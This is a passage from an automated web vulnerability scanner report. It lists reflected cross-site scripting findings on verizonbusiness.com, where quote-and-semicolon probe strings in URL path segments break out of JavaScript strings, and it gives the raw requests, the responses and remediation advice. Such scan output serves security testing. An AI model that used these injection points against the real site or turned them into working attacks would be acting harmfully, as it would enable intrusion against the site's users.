Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/networkingcbd1d";c1e63abf5fe/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.972. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d60b6'%3bfca45d14847 was submitted in the REST URL parameter 3. This input was echoed as d60b6';fca45d14847 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/networkingd60b6'%3bfca45d14847/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:45 GMT
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/networkingd60b6';fca45d14847/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.973. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bf65'%3b727bc9be372 was submitted in the REST URL parameter 1. This input was echoed as 2bf65';727bc9be372 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions2bf65'%3b727bc9be372/bysolutions/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions2bf65';727bc9be372/bysolutions/outsourcing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.974. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23ee1"%3b5a1a301d336 was submitted in the REST URL parameter 1. This input was echoed as 23ee1";5a1a301d336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions23ee1"%3b5a1a301d336/bysolutions/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions23ee1";5a1a301d336/bysolutions/outsourcing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.975. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ba3"%3b3abf0d35ae was submitted in the REST URL parameter 2. This input was echoed as 60ba3";3abf0d35ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions60ba3"%3b3abf0d35ae/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41876
Date: Wed, 17 Nov 2010 00:35:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions60ba3";3abf0d35ae/outsourcing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.976. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2b11'%3bd20861ee77b was submitted in the REST URL parameter 2. This input was echoed as d2b11';d20861ee77b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd2b11'%3bd20861ee77b/outsourcing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:18 GMT
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd2b11';d20861ee77b/outsourcing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.977. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fda'%3b158a31ed97c was submitted in the REST URL parameter 3. This input was echoed as 40fda';158a31ed97c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/outsourcing40fda'%3b158a31ed97c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/outsourcing40fda';158a31ed97c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.978. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/outsourcing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f75"%3bd939577d8b5 was submitted in the REST URL parameter 3. This input was echoed as 38f75";d939577d8b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/outsourcing38f75"%3bd939577d8b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:52 GMT
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/outsourcing38f75";d939577d8b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.979. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b124f'%3b6025ac978be was submitted in the REST URL parameter 1. This input was echoed as b124f';6025ac978be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsb124f'%3b6025ac978be/bysolutions/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsb124f';6025ac978be/bysolutions/productivity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.980. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c08c"%3b82f1e5d6685 was submitted in the REST URL parameter 1. This input was echoed as 4c08c";82f1e5d6685 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4c08c"%3b82f1e5d6685/bysolutions/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions4c08c";82f1e5d6685/bysolutions/productivity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.981. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccbfd'%3bd92b3d19e02 was submitted in the REST URL parameter 2. This input was echoed as ccbfd';d92b3d19e02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsccbfd'%3bd92b3d19e02/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsccbfd';d92b3d19e02/productivity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.982. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa27f"%3bc972096f565 was submitted in the REST URL parameter 2. This input was echoed as fa27f";c972096f565 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsfa27f"%3bc972096f565/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsfa27f";c972096f565/productivity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.983. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98ae8'%3b12407ce8189 was submitted in the REST URL parameter 3. This input was echoed as 98ae8';12407ce8189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/productivity98ae8'%3b12407ce8189/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/productivity98ae8';12407ce8189/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.984. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3a8"%3b34da4bb390d was submitted in the REST URL parameter 3. This input was echoed as 9a3a8";34da4bb390d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/productivity9a3a8"%3b34da4bb390d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
